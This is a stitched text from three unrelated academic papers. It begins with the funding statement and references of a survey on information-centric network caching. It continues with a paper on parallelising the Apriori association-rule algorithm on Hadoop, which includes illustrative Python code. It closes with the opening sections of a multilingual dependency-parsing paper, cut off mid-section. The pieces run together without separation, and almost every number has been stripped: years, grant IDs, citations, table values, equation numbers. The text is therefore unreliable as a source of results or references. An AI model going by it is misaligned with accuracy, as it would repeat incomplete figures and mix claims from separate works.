additionally, the dynamic nature of most networks leads to on-demand changes in the context characteristics, for instance, changes in traffic patterns or user preferences, and the icn strategies must adapt to these changes in an attempt to ensure the best network performance. therefore, there is the need to assist the choosing process of suitable schemes according to the current context, and further, to cope with the natural dynamism of context variations in networks. additional information and declarations funding this work was supported by capes ( . / - ), fapesb (tic / ), cnpq ( . / - , / - ), and faperj (e- / . / ). there was no pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: capes: . / - . fapesb: tic / . cnpq: . / - and / - . faperj: e- / . / . competing interests the authors declare that they have no competing interests. author contributions � stéfani pires conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � artur ziviani conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � leobino n. sampaio conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the study did not use raw data or code as it is a literature review. references abdullahi i, arif s, hassan s. . survey on caching approaches in information centric networking. journal of network and computer applications : – . abidi a, gammar s. . towards new caching strategy for information-centric networking based on data proximity control. in: ieee international conference on computer and information technology; ubiquitous computing and communications; dependable, autonomic and secure computing; pervasive intelligence and computing (cit/iucc/dasc/picom). piscataway: ieee, – . abowd gd, dey ak, brown pj, davies n, smith m, steggles p. . towards a better understanding of context and context-awareness. in: international symposium on handheld and ubiquitous computing. springer, – . abrams m, standridge c, abdulla g, fox e, williams s. . removal policies in network caches for world-wide web documents. acm sigcomm computer communication review ( ): – . acs g, conti m, gasti p, ghali c, tsudik g. . cache privacy in named-data networking. in: ieee rd international conference on distributed computing systems. piscataway: ieee, – . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ahlgren b, dannewitz c, imbrenda c, kutscher d, ohlman b. . a survey of information- centric networking. ieee communications magazine ( ): – . al-turjman f. . cognitive caching for the future sensors in fog networking. pervasive and mobile computing : – . al-turjman fm, al-fagih ae, hassanein hs. . a value-based cache replacement approach for information-centric networks. in: lcn workshops. – . alegre u, augusto jc, clark t. . 
international journal of advanced network, monitoring and controls

research and improvement of apriori algorithm based on hadoop

gao pengfei, wang jianguo and liu pengcheng
school of computer science and engineering, xi'an technological university, xi'an, shaanxi province, china
gaopf @gmail.com, wjg_xit@ .com, @qq.com

abstract—association rule mining can effectively reveal hidden relationships in big data, and the apriori algorithm is one of the most significant association rule algorithms. traditional mining based on the parallel apriori algorithm spends more and more time on data i/o as the size of the transaction database grows. this paper improves the apriori algorithm by compressing transactions, reducing the number of scans, and simplifying candidate set generation, and then parallelizes the improved algorithm on the hadoop framework. the experiments show that the improved algorithm is suitable for large-scale data mining and has good scalability and effectiveness.

keywords—apriori algorithm; hadoop; association rules

i. introduction

with the explosive growth of big data, close relationships frequently exist among vast amounts of data[ ]. analysis and decision making through data mining have become mainstream. to better discover the relevance within transaction data sets, researchers introduced association rule mining[ ]. the concept attracted wide attention at home and abroad, a great deal of analysis has been done in this field, and many data mining algorithms have been put forward. one of the most famous association rule algorithms is the apriori algorithm, a classic association rule algorithm designed by agrawal[ - ]. it is a level-by-level iterative search method that uses frequent k-item sets to construct candidate (k+1)-item sets. its main ideas are: first, all frequent item sets are counted from the transaction database, and the support of a frequent item set must not be less than the minimum support; second, strong association rules are generated, and a rule must satisfy the support and confidence thresholds at the same time; third, only the rules whose confidence is greater than or equal to the minimum confidence are retained.

the hadoop[ ] framework originated from an open source project developed by the apache foundation. because of its epoch-making significance, the hadoop framework has been widely used in the information field at home and abroad. there are two important modules in the hadoop framework: the distributed file system hdfs and the distributed computing framework mapreduce[ ]. as a distributed file system, hdfs implements data storage and works in conjunction with the computational framework. mapreduce provides the underlying support for data computation; the idea of mapreduce[ - ] is based on a paper by google. in short, its core idea is "decompose the task and aggregate the results."
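for clarity, the support and confidence thresholds mentioned above follow the standard definitions used in association rule mining (these formulas are added here for reference and are not spelled out in the original text). for a rule x ⇒ y over a transaction database d:

    support(x ⇒ y)    = |{ t ∈ d : x ∪ y ⊆ t }| / |d|
    confidence(x ⇒ y) = support(x ∪ y) / support(x)

a rule is called strong when its support is not less than the minimum support and its confidence is not less than the minimum confidence.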
ii. brief introduction and research status of the apriori algorithm

a. overview of the apriori algorithm

the apriori algorithm is a level-by-level iterative search method that uses frequent k-item sets to construct candidate (k+1)-item sets. first, the frequent 1-item set l1 is obtained; l1 is used to generate the frequent 2-item set l2, and l2 is used to generate the frequent 3-item set l3. following this rule, when no frequent k-item set can be found any more, the algorithm ends[ - ]. the specific operation is as follows:
1) iterate through the initial transaction database and count the frequency of occurrence of each candidate item; the result is the support of the item. all items whose support is no lower than the preset threshold form the frequent 1-item set l1.
2) the algorithm joins l1 with l1 to form the candidate 2-item set c2.
3) using the items in c2, traverse the database again to obtain the support of each candidate set. all candidates whose support is no lower than the threshold form the frequent 2-item set l2.
4) the algorithm joins l2 with l2 to form the candidate 3-item set c3.
5) using the items in c3, traverse the database again to obtain the support of each candidate set. all candidates whose support is no lower than the threshold form the frequent 3-item set l3.
the above process is performed iteratively until the candidate set ck is empty. the apriori algorithm therefore performs multiple i/o operations on the database. each stage consists of two parts, namely connection (self-join) and pruning.
figure: apriori flow.

b. apriori algorithm instance analysis

the original transaction database contains four transactions: t1={a,c,d}, t2={b,c,e}, t3={a,b,c,e}, t4={b,e}. suppose the minimum support count is min_sup=2, i.e. an item set must appear in at least two of the four transactions. then l1={{a},{b},{c},{e}} and l2={{a,c},{b,c},{b,e},{c,e}}.
1) self-join: c3 = l2 ⋈ l2 = {{a,c},{b,c},{b,e},{c,e}} ⋈ {{a,c},{b,c},{b,e},{c,e}} = {{a,b,c},{a,c,e},{b,c,e}}.
2) pruning: every subset of a frequent item set must also be frequent. for the candidate set c3, the candidates with infrequent subsets are cleared: the two-item subsets of {a,b,c} are {a,b},{a,c},{b,c}, and {a,b} is not an element of l2, so this candidate is removed; the two-item subsets of {a,c,e} are {a,c},{a,e},{c,e}, and {a,e} is not an element of l2, so this candidate is removed; the two-item subsets of {b,c,e} are {b,c},{b,e},{c,e}, which all belong to l2, so this candidate is not deleted.
3) in this way, c3={{b,c,e}} is obtained after pruning.
figure: apriori algorithm execution process.

c. the shortcomings of the apriori algorithm

1) when the apriori algorithm generates the candidate item set, it needs to perform the self-join operation on the frequent item sets obtained in the previous step, and then scan the transaction data set again to compare the candidates formed by the self-join against min_sup. during the self-join operation, a large amount of comparison work is performed.
2) the apriori algorithm needs to rescan the transaction data set before pruning and then compare against min_sup. therefore, as the transaction data set grows larger and larger, each scan consumes a lot of time, resulting in inefficient mining.
3) in the current situation where data has high dimensionality and complex types, the classical apriori algorithm cannot satisfy users.
4) because the classic apriori algorithm is only applicable to a single machine, as the size of the transaction data set gradually becomes larger, mining becomes inefficient, storage space becomes insufficient, and the system may even crash.
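to make the connection and pruning steps above concrete, the following short python sketch reproduces the instance analysis of section ii.b. it is written for this text as an illustration only (it is not code from the original paper); the transaction data and the min_sup value are the ones used in the example.

from itertools import combinations

def apriori(transactions, min_sup):
    # plain level-wise apriori: returns {frozenset item set: support count}
    counts = {}
    for t in transactions:
        for item in t:
            key = frozenset([item])
            counts[key] = counts.get(key, 0) + 1
    frequent = {s: c for s, c in counts.items() if c >= min_sup}   # l1
    all_frequent = dict(frequent)
    k = 1
    while frequent:
        # connection step: self-join lk to build candidate (k+1)-item sets
        prev = list(frequent)
        candidates = set()
        for i in range(len(prev)):
            for j in range(i + 1, len(prev)):
                union = prev[i] | prev[j]
                if len(union) == k + 1:
                    candidates.add(union)
        # pruning step: every k-subset of a candidate must itself be frequent
        candidates = {c for c in candidates
                      if all(frozenset(sub) in frequent for sub in combinations(c, k))}
        # one scan of the transaction database to count the surviving candidates
        counts = {c: sum(1 for t in transactions if c <= t) for c in candidates}
        frequent = {c: n for c, n in counts.items() if n >= min_sup}
        all_frequent.update(frequent)
        k += 1
    return all_frequent

# worked example from section ii.b: {b,c,e} is the only frequent 3-item set
transactions = [frozenset("acd"), frozenset("bce"), frozenset("abce"), frozenset("be")]
print(apriori(transactions, min_sup=2))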
iii. parallel mec-apriori algorithm based on mapreduce

a. reducing frequent item set self-join comparisons and pruning steps

in the processing of candidate sets, a method based on the transaction compression property is introduced: if an n-dimensional data item set is not itself a frequent item set, then any (n+1)-dimensional item set that contains it cannot be frequent either. therefore, when mining candidate sets from the transaction database, the transaction compression property allows candidates to be compared and deleted early, so the number of candidate sets is gradually reduced and the time efficiency of mining frequent item sets is improved.

b. reducing the number of database scans

when mining frequent item sets, the original transaction database is converted into a vertical data table (each item mapped to the transactions that contain it), and frequent item sets are then mined by scanning this vertical table. because the transaction database itself is scanned only once, the frequent i/o problem is solved to some extent.

c. combining the apriori algorithm with the hadoop platform

with the ever-increasing size of data, the traditional apriori algorithm can hardly handle massive transaction databases. the solution to this problem is to run the apriori algorithm on the hadoop distributed platform[ ], which not only makes the traditional apriori algorithm run more efficiently but also eases the storage pressure of the transaction database.

1) generating frequent item sets. the flow of this stage is shown in the figure below.
figure: generate frequent item sets flow.
a) data block formatting. the inputformat interface, through its recordreader implementation, converts data blocks into key-value pairs, e.g. <key, value>.
b) perform the map task. the idea of this step is to generate the frequent item sets of each data block.
c) perform the reduce task. the key-value data output by the combiner function is used as the input of the reduce phase. after a series of merging steps, the local frequent item sets of the data blocks are obtained as the global candidate item set.
d) scan the transaction data set d. the map function is called to rescan the global candidate frequent item sets, self-join them, and compare the resulting item sets against the minimum support count. if no candidate reaches the minimum support, the last local frequent item sets are the final global frequent item sets and are passed to the reduce function to be summarized; otherwise, the local frequent item sets are iterated until the final frequent item sets are generated. a minimal illustration of this counting pass is sketched below.
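this sketch is not from the original paper; a real deployment would use hadoop's java mapreduce api or hadoop streaming, and the candidate list below is a hard-coded placeholder that would normally be shipped to every node (for example through the distributed cache).

mapper (python, hadoop-streaming style; each input line is one transaction with items separated by spaces):

import sys

CANDIDATES = [frozenset({"b", "c", "e"})]      # placeholder global candidate item sets
for line in sys.stdin:
    transaction = frozenset(line.split())
    for candidate in CANDIDATES:
        if candidate <= transaction:           # candidate contained in this transaction
            print("%s\t1" % ",".join(sorted(candidate)))

reducer (sums the partial counts per item set and keeps those reaching the minimum support count; with hadoop streaming the input arrives grouped by key):

import sys

MIN_SUP = 2                                    # placeholder minimum support count
current_key, count = None, 0

def emit(key, n):
    if key is not None and n >= MIN_SUP:
        print("%s\t%d" % (key, n))

for line in sys.stdin:
    key, value = line.rstrip("\n").split("\t")
    if key != current_key:
        emit(current_key, count)
        current_key, count = key, 0
    count += int(value)
emit(current_key, count)

with hadoop streaming, the two scripts would be supplied through the -mapper and -reducer options, and the combiner described in the flow performs the same per-node summing before the reduce phase.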
2) generating association rules. after the frequent item sets have been mined, strong rules need to be generated. the generation of strong rules is shown in the figure below.
figure: generate strong rules flow.
a) in the transaction data set stored as text, the input data of the map phase must exist in the form of key-value pairs, so each row of data is treated as one transaction; the key is the offset of the row and the value is the row itself.
b) these key-value pairs are used as the input of the map function, and the frequent item sets that meet the configured support threshold are obtained.
c) the output of the combiner function in the map stage is used as the input of the reduce stage; it is processed according to the local frequent item sets generated in the map stage, and the resulting strong association rules are finally stored in hdfs.

iv. experimental assessment and analysis

a. setting up a hadoop cluster environment

the size of a hadoop cluster is arbitrary: a small cluster can consist of one namenode and several datanodes, while a large cluster can consist of one namenode and hundreds of datanodes. hadoop clusters can be built in three modes: local mode, pseudo-distributed mode and fully-distributed mode. considering hardware constraints, this paper uses virtual machines to set up the cluster environment; the number of nodes in the cluster is shown in the figure below.
figure: build a cluster environment.

b. data comparison experiment

1) uci experimental data. this experiment selects the retail file from the uci repository (a classic data set for association rule studies) as the experimental transaction data set. by comparing the mec-apriori algorithm with the traditional apriori algorithm, the results show that the time performance of the mec-apriori algorithm is greatly improved when mining frequent item sets and candidate item sets, which verifies the efficiency and feasibility of the improved algorithm.

2) implementing the mec-apriori algorithm model. first, the experimental data set in the retail file is selected and mined with the new mec-apriori algorithm; the association rules are then obtained according to the user-defined support and confidence thresholds.
figure: simulation flow.

3) experiment content and result analysis.
experiment 1: performance comparison between the single-machine apriori algorithm and the mec-apriori algorithm. the transaction data set for this experiment is stored as a file, and the mining time before and after the improvement is measured on the hadoop cluster built above. first, keeping the number of nodes in the hadoop cluster unchanged, the number of item sets in the experimental data is continuously increased while the minimum support is kept the same (min_sup = . ). the experimental results are shown in table i.
table i. comparing apriori and mec-apriori mining time (columns: number of transaction item sets; apriori mining time/s; mec-apriori mining time/s).
the results are converted into a line chart to make the comparison more intuitive; the figure shows the time performance of mec-apriori versus apriori (horizontal axis: number of transaction item sets; vertical axis: time/s).
figure: time performance before and after the improvement.
as the figure shows, for the same number of transaction item sets the mec-apriori algorithm is consistently better than the classical apriori algorithm in time performance. as the number of transaction item sets increases, the mining time of the apriori algorithm running on a single computer grows significantly, whereas the relative time performance of the mec-apriori algorithm becomes better and better, because the work is increasingly shared among the nodes of the distributed cluster. in summary, the improved mec-apriori algorithm is superior to the classic apriori algorithm in time performance.
Experiment 2: performance comparison between the Apriori algorithm and the MEC-Apriori algorithm under different support levels. First, this experiment tests the retail data set, selecting a range of minimum-support thresholds and increasing the threshold in evenly spaced steps within that range. The data set is then mined with the Apriori algorithm and the MEC-Apriori algorithm in turn, and the running time is recorded (in seconds). The figure below shows the experimental data obtained by executing the algorithms (horizontal axis: support; vertical axis: time/s). The experiments show that the MEC-Apriori algorithm runs in much less time than the Apriori algorithm at every support level; at higher support levels the Apriori algorithm is only a little slower than the MEC-Apriori algorithm. In summary, the time performance of the MEC-Apriori algorithm is superior to that of the traditional Apriori algorithm at all tested support levels.

Figure. Performance comparison under different support levels

v. conclusion

The traditional Apriori algorithm must repeatedly scan the transaction data set when mining frequent itemsets, which leads to heavy system I/O overhead and other shortcomings. In this paper, the Apriori algorithm is improved in three respects: compressing the transactions, reducing the number of scans, and simplifying candidate-set generation. At the same time, the improved algorithm is parallelized in the Hadoop framework. The simulation results show that, compared with the traditional Apriori algorithm, the MEC-Apriori algorithm performs well in running time, in mining frequent and candidate itemsets, and across different support levels. It still needs to be improved further in future work.

Many Languages, One Parser

Waleed Ammar♦, George Mulcaire♥, Miguel Ballesteros♠♦, Chris Dyer♦, Noah A.
smith♥ ♦school of computer science, carnegie mellon university, pittsburgh, pa, usa ♥computer science & engineering, university of washington, seattle, wa, usa ♠nlp group, pompeu fabra university, barcelona, spain wammar@cs.cmu.edu, gmulc@uw.edu, miguel.ballesteros@upf.edu cdyer@cs.cmu.edu, nasmith@cs.washington.edu abstract we train one multilingual model for depen- dency parsing and use it to parse sentences in several languages. the parsing model uses (i) multilingual word clusters and em- beddings; (ii) token-level language informa- tion; and (iii) language-specific features (fine- grained pos tags). this input representation enables the parser not only to parse effec- tively in multiple languages, but also to gener- alize across languages based on linguistic uni- versals and typological similarities, making it more effective to learn from limited annota- tions. our parser’s performance compares fa- vorably to strong baselines in a range of data scenarios, including when the target language has a large treebank, a small treebank, or no treebank for training. introduction developing tools for processing many languages has long been an important goal in nlp (rösner, ; heid and raab, ), but it was only when statistical methods became standard that massively multilingual nlp became economical. the main- stream approach for multilingual nlp is to design language-specific models. for each language of in- terest, the resources necessary for training the model are obtained (or created), and separate parameters are fit for each language separately. this approach is simple and grants the flexibility of customizing as of , the total number of native speakers of the hundred most popular languages only accounts for % of the world’s population (wikipedia, ). the model and features to the needs of each lan- guage, but it is suboptimal for theoretical and prac- tical reasons. theoretically, the study of linguistic typology tells us that many languages share mor- phological, phonological, and syntactic phenomena (bender, ); therefore, the mainstream approach misses an opportunity to exploit relevant supervi- sion from typologically related languages. practi- cally, it is inconvenient to deploy or distribute nlp tools that are customized for many different lan- guages because, for each language of interest, we need to configure, train, tune, monitor, and occasion- ally update the model. furthermore, code-switching or code-mixing (mixing more than one language in the same discourse), which is pervasive in some gen- res, in particular social media, presents a challenge for monolingually-trained nlp models (barman et al., ). in parsing, the availability of homogeneous syn- tactic dependency annotations in many languages (mcdonald et al., ; nivre et al., b; agić et al., ; nivre et al., a) has created an opportunity to develop a parser that is capable of parsing sentences in multiple languages, address- ing these theoretical and practical concerns. a multilingual parser can potentially replace an array of language-specific monolingually-trained parsers while our parser can be used to parse input with code- switching, we have not evaluated this capability due to the lack of appropriate data. although multilingual dependency treebanks have been available for a decade via the and conll shared tasks (buchholz and marsi, ; nivre et al., ), the tree- bank of each language was annotated independently and with its own annotation conventions. transactions of the association for computational linguistics, vol. , pp. 
– , . action editor: david chiang. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. (for languages with a large treebank). the same approach has been used in low-resource scenarios (with no treebank or a small treebank in the target language), where indirect supervision from auxiliary languages improves the parsing quality (cohen et al., ; mcdonald et al., ; zhang and barzi- lay, ; duong et al., a; duong et al., b; guo et al., ), but these models may sacrifice ac- curacy on source languages with a large treebank. in this paper, we describe a model that works well for both low-resource and high-resource scenarios. we propose a parsing architecture that takes as in- put sentences in several languages, optionally pre- dicting the part-of-speech (pos) tags and input lan- guage. the parser is trained on the union of avail- able universal dependency annotations in different languages. our approach integrates and critically relies on several recent developments related to de- pendency parsing: universal pos tagsets (petrov et al., ), cross-lingual word clusters (täckström et al., ), selective sharing (naseem et al., ), universal dependency annotations (mcdonald et al., ; nivre et al., b; agić et al., ; nivre et al., a), advances in neural network architec- tures (chen and manning, ; dyer et al., ), and multilingual word embeddings (gardner et al., ; guo et al., ; ammar et al., ). we show that our parser compares favorably to strong baselines trained on the same treebanks in three data scenarios: when the target language has a large tree- bank (table ), a small treebank (table ), or no treebank (table ). our parser is publicly available. overview our goal is to train a dependency parser for a set of target languages lt, given universal dependency annotations in a set of source languages ls. ide- ally, we would like to have training data in all tar- get languages (i.e., lt ⊆ ls), but we are also inter- ested in the case where the sets of source and target languages are disjoint (i.e., lt ∩ ls = ∅). when all languages in lt have a large treebank, the main- stream approach has been to train one monolingual parser per target language and route sentences of a we discuss data requirements in the next section. https://github.com/clab/ language-universal-parser given language to the corresponding parser at test time. in contrast, our approach is to train one pars- ing model with the union of treebanks in ls, then use this single trained model to parse text in any lan- guage in lt, hence the name “many languages, one parser” (malopa). malopa strikes a balance be- tween: ( ) enabling cross-lingual model transfer via language-invariant input representations; i.e., coarse pos tags, multilingual word embeddings and mul- tilingual word clusters, and ( ) tweaking the be- havior of the parser depending on the current input language via language-specific representations; i.e., fine-grained pos tags and language embeddings. in addition to universal dependency annotations in source languages (see table ), we use the follow- ing data resources for each language in l = lt∪ls: • universal pos annotations for training a pos tag- ger, • a bilingual dictionary with another language in l for adding cross-lingual lexical information, • language typology information, • language-specific pos annotations, and • a monolingual corpus. 
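As a rough illustration of the data-level side of this setup, the sketch below assembles one training set from several source treebanks while keeping a sentence-level language ID, which is what later allows language-specific representations to be used alongside the shared ones. The file layout, field positions, and function names are assumptions for illustration, not the actual MaLOPa pipeline.

```python
from pathlib import Path

def read_conllu_sentences(path):
    """Yield sentences as lists of (form, coarse_pos, head, deprel) tuples.

    Assumes a simplified CoNLL-U-like layout; comment lines start with '#'
    and multi-word token lines are not handled.
    """
    sentence = []
    for line in Path(path).read_text(encoding="utf-8").splitlines():
        if not line.strip():
            if sentence:
                yield sentence
                sentence = []
        elif not line.startswith("#"):
            cols = line.split("\t")
            sentence.append((cols[1], cols[3], int(cols[6]), cols[7]))
    if sentence:
        yield sentence

def build_multilingual_training_set(treebank_paths):
    """Union of source treebanks; every sentence keeps its language ID so the
    model can combine language-invariant and language-specific features."""
    training_set = []
    for lang_id, path in treebank_paths.items():
        for sentence in read_conllu_sentences(path):
            training_set.append({"lang": lang_id, "tokens": sentence})
    return training_set

# Hypothetical paths; point these at real UD training splits before running.
corpus = build_multilingual_training_set({
    "de": "ud/de-train.conllu",
    "en": "ud/en-train.conllu",
    "sv": "ud/sv-train.conllu",
})
```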
novel contributions of this paper include: (i) us- ing one parser instead of an array of monolingually- trained parsers without sacrificing accuracy on lan- guages with a large treebank, (ii) an effective neural network architecture for using language embeddings to improve multilingual parsing, and (iii) a study of how automatic language identification affects the performance of a multilingual dependency parser. while not the primary focus of this paper, we also show that a variant of our parser outperforms pre- vious work on multi-source cross-lingual parsing in see § . for details. our best results make use of this resource. we require that all languages in l are (transitively) connected. the bilingual dictionaries we used are based on unsupervised word align- ments of parallel corpora, as described in guo et al. ( ). see § . for details. see § . for details. our best results make use of this resource. see § . for details. this is only used for training word embeddings with ‘mul- ticca,’ ‘multicluster’ and ‘translation-invariance’ methods in table . we do not use this resource when we compare to pre- vious work. https://github.com/clab/language-universal-parser https://github.com/clab/language-universal-parser german (de) english (en) spanish (es) french (fr) italian (it) portuguese (pt) swedish (sv) udt train ( ) ( ) ( ) ( ) ( ) ( ) ( ) dev. ( ) ( ) ( ) ( ) ( ) ( ) ( ) test ( ) ( ) ( ) ( ) ( ) ( ) ( ) ud . train ( ) ( ) ( ) ( ) ( ) ( ) ( ) dev. ( ) ( ) ( ) ( ) ( ) ( ) ( ) test ( ) ( ) ( ) ( ) ( ) ( ) ( ) tags - - - table : number of sentences (tokens) in each treebank split in universal dependency treebanks (udt) version . and universal dependencies (ud) version . for the languages we experiment with. the last row gives the number of unique language-specific fine-grained pos tags used in a treebank. low resource scenarios, where languages in lt have a small treebank (see table ) or where lt ∩ls = ∅ (see table ). in the small treebank setup with , token annotations, we show that our parser consis- tently outperforms a strong monolingual baseline with . absolute las (labeled attachment score) points per language, on average. parsing model recent advances suggest that recurrent neural net- works, especially long short-term memory (lstm) architectures, are capable of learning useful repre- sentations for modeling problems of sequential na- ture (graves et al., ; sutskever et al., ). in this section, we describe our language-universal parser, which extends the stack lstm (s-lstm) parser of dyer et al. ( ). . transition-based parsing with s-lstms this section briefly reviews dyer et al.’s s-lstm parser, which we modify in the following sections. the core parser can be understood as the sequential manipulation of three data structures: • a buffer (from which we read the token sequence), • a stack (which contains partially-built parse trees), and • a list of actions previously taken by the parser. the parser uses the arc-standard transition system (nivre, ). at each timestep t, a transition ac- tion is applied that alters these data structures ac- cording to table . in a preprocessing step, we transform nonprojective trees in the training treebanks to pseudo-projective trees using the “baseline” scheme in (nivre and nilsson, ). we evaluate against the original nonprojective test set. along with the discrete transitions of the arc- standard system, the parser computes vector repre- sentations for the buffer, stack and list of actions at time step t denoted bt, st, and at, respectively. 
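A minimal sketch of the arc-standard transitions over these data structures (token indices only, without the stack-LSTM representations, action preconditions, or scoring; the head-direction conventions below follow the usual arc-standard description, which different papers write in slightly different notation):

```python
class ArcStandardState:
    """Minimal arc-standard parser state: a stack, a buffer, and the arcs built so far."""

    def __init__(self, words):
        self.words = words
        self.stack = []                          # indices of partially built subtrees
        self.buffer = list(range(len(words)))    # indices still to be read
        self.arcs = []                           # (head, dependent, label) triples

    def shift(self):
        # Move the front of the buffer onto the stack.
        self.stack.append(self.buffer.pop(0))

    def reduce_left(self, label):
        # The top of the stack becomes the head of the element below it.
        head = self.stack.pop()
        dependent = self.stack.pop()
        self.arcs.append((head, dependent, label))
        self.stack.append(head)

    def reduce_right(self, label):
        # The element below the top becomes the head of the top.
        dependent = self.stack.pop()
        head = self.stack[-1]
        self.arcs.append((head, dependent, label))

    def is_terminal(self):
        return not self.buffer and len(self.stack) == 1


# Tiny usage example: parse "the cat sleeps" with a hand-chosen action sequence.
state = ArcStandardState(["the", "cat", "sleeps"])
state.shift(); state.shift()
state.reduce_left("det")      # "cat" becomes head of "the"
state.shift()
state.reduce_left("nsubj")    # "sleeps" becomes head of "cat"
assert state.is_terminal()
print(state.arcs)             # [(1, 0, 'det'), (2, 1, 'nsubj')]
```

The neural part of the parser then scores which of these transitions to take at each step, conditioned on the vector representations of the stack, buffer, and action history.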
the parser state at time t is given by: pt = max{ ,w[st; bt; at] + wbias} ( ) where the matrix w and the vector wbias are learned parameters. the matrix w is multiplied by the vector [st; bt; at] created by the concatenation of st,bt,at. the parser state pt is then used to define a categorical distribution over possible next actions z: p(z | pt) = exp ( g>z pt + qz ) ∑ z′ exp ( g>z′pt + qz′ ) ( ) where gz and qz are parameters associated with ac- tion z. the selected action is then used to update the buffer, stack and list of actions, and to compute bt+ , st+ and at+ accordingly. the model is trained to maximize the log- likelihood of correct actions. at test time, the parser greedily chooses the most probable action in every time step until a complete parse tree is produced. the following sections describe our extensions of the core parser. more details about the core parser can be found in dyer et al. ( ). . token representations the vector representations of input tokens feed into the stack-lstm modules of the buffer and the stack. a stack-lstm module is used to compute the vector rep- resentation for each data structure, as detailed in dyer et al. ( ). the total number of actions is + × the number of unique dependency labels in the treebank used for training, but we only consider actions which meet the arc-standard preconditions in fig. . stackt buffert action dependency stackt+ buffert+ u,v,s b reduce-right(r) u r→ v u,s b u,v,s b reduce-left(r) u r← v v,s b s u,b shift — u,s b table : parser transitions indicating the action applied to the stack and buffer at time t and the resulting stack and buffer at time t + . for monolingual parsing, we represent each token by concatenating the following vectors: • a fixed, pretrained embedding of the word type, • a learned embedding of the word type, • a learned embedding of the brown cluster, • a learned embedding of the fine-grained pos tag, • a learned embedding of the coarse pos tag. for multilingual parsing with malopa, we start with a simple delexicalized model where the token representation only consists of learned embeddings of coarse pos tags, which are shared across all lan- guages to enable model transfer. in the following subsections, we enhance the token representation in malopa to include lexical embeddings, language embeddings, and fine-grained pos embeddings. . lexical embeddings previous work has shown that sacrificing lexical fea- tures amounts to a substantial decrease in the perfor- mance of a dependency parser (cohen et al., ; täckström et al., ; tiedemann, ; guo et al., ). therefore, we extend the token representa- tion in malopa by concatenating learned embed- dings of multilingual word clusters, and pretrained multilingual embeddings of word types. multilingual brown clusters. before training the parser, we estimate brown clusters of english words and project them via word alignments to words in other languages. this is similar to the ‘projected clusters’ method in täckström et al. ( ). to go from brown clusters to embeddings, we ignore the hierarchy within brown clusters and assign a unique parameter vector to each cluster. multilingual word embeddings. we also use guo et al.’s ( ) ‘robust projection’ method to pre- train multilingual word embeddings. the first step in ‘robust projection’ is to learn embeddings for en- glish words using the skip-gram model (mikolov et al., ). 
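Returning briefly to the parser-state computation above: Eq. (1) is a rectified affine transformation of the concatenated stack, buffer, and action-history representations, and Eq. (2) is a softmax over next actions. A small NumPy sketch with made-up dimensions is shown below; it is meant only to make the shapes concrete, not to reproduce the trained model.

```python
import numpy as np

def parser_state(s_t, b_t, a_t, W, w_bias):
    """p_t = max(0, W [s_t; b_t; a_t] + w_bias)  -- Eq. (1) in the text."""
    concat = np.concatenate([s_t, b_t, a_t])
    return np.maximum(0.0, W @ concat + w_bias)

def action_distribution(p_t, G, q):
    """Softmax over possible next actions -- Eq. (2); row z of G and entry q[z]
    play the roles of the parameters g_z and q_z for action z."""
    scores = G @ p_t + q
    scores -= scores.max()            # subtract max for numerical stability
    exp = np.exp(scores)
    return exp / exp.sum()

# Made-up dimensions for illustration only.
d_repr, d_state, n_actions = 100, 80, 5
rng = np.random.default_rng(0)
s_t, b_t, a_t = (rng.normal(size=d_repr) for _ in range(3))
W = rng.normal(size=(d_state, 3 * d_repr))
w_bias = rng.normal(size=d_state)
G = rng.normal(size=(n_actions, d_state))
q = rng.normal(size=n_actions)

p_t = parser_state(s_t, b_t, a_t, W, w_bias)
probs = action_distribution(p_t, G, q)
next_action = int(np.argmax(probs))   # greedy choice, as the parser does at test time
```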
then, we compute an embedding of non- english words as the weighted average of english word embeddings, using word alignment probabili- ties as weights. the last step computes an embed- ding of non-english words which are not aligned to any english words by averaging the embeddings of all words within an edit distance of in the same language. we experiment with two other methods— ‘multicca’ and ‘multicluster,’ both proposed by ammar et al. ( )—for pretraining multilingual word embeddings in § . . ‘multicca’ uses a lin- ear operator to project pretrained monolingual em- beddings in each language (except english) to the vector space of pretrained english word embed- dings, while ‘multicluster’ uses the same embed- ding for translationally-equivalent words in different languages. the results in table illustrate that the three methods perform similarly on this task. . language embeddings while many languages, especially ones that belong to the same family, exhibit some similar syntac- tic phenomena (e.g., all languages have subjects, verbs, and objects), substantial syntactic differences abound. some of these differences are easy to char- acterize (e.g., subject-verb-object vs. verb-subject- object, prepositions vs. postpositions, adjective- noun vs. noun-adjective), while others are sub- tle (e.g., number and positions of negation mor- phemes). it is not at all clear how to translate de- scriptive facts about a language’s syntax into fea- tures for a parser. consequently, training a language-universal parser on treebanks in multiple source languages requires caution. while exposing the parser to a diverse set of syntactic patterns across many lan- guages has the potential to improve its performance in each, dependency annotations in one language will, in some ways, contradict those in typologically different languages. for instance, consider a context where the next word on the buffer is a noun, and the top word on the stack is an adjective, followed by a noun. tree- banks of languages where postpositive adjectives are typical (e.g., french) will often teach the parser to predict reduce-left, while those of languages where prepositive adjectives are more typical (e.g., english) will teach the parser to predict shift. inspired by naseem et al. ( ), we address this problem by informing the parser about the input lan- guage it is currently parsing. let l be the input vector representation of a particular language. we consider three definitions for l: • one-hot encoding of the language id, • one-hot encoding of individual word-order prop- erties, and • averaged one-hot encoding of wals typological properties (including word-order properties). it is worth noting that the first definition (language id) turns out to work best in our experiments. we use a hidden layer with tanh nonlinearity to compute the language embedding l′ as: l′ = tanh(ll + lbias) where the matrix l and the vector lbias are addi- tional model parameters. we modify the parsing ar- chitecture as follows: • include l′ in the token representation (which feeds into the stack-lstm modules of the buffer and the stack as described in § . ), the files which contain these definitions are available at https://github.com/clab/ language-universal-parser/tree/master/ typological_properties. the world atlas of language structures (wals; dryer and haspelmath, ) is an online portal documenting typo- logical properties of , languages (as of july ). 
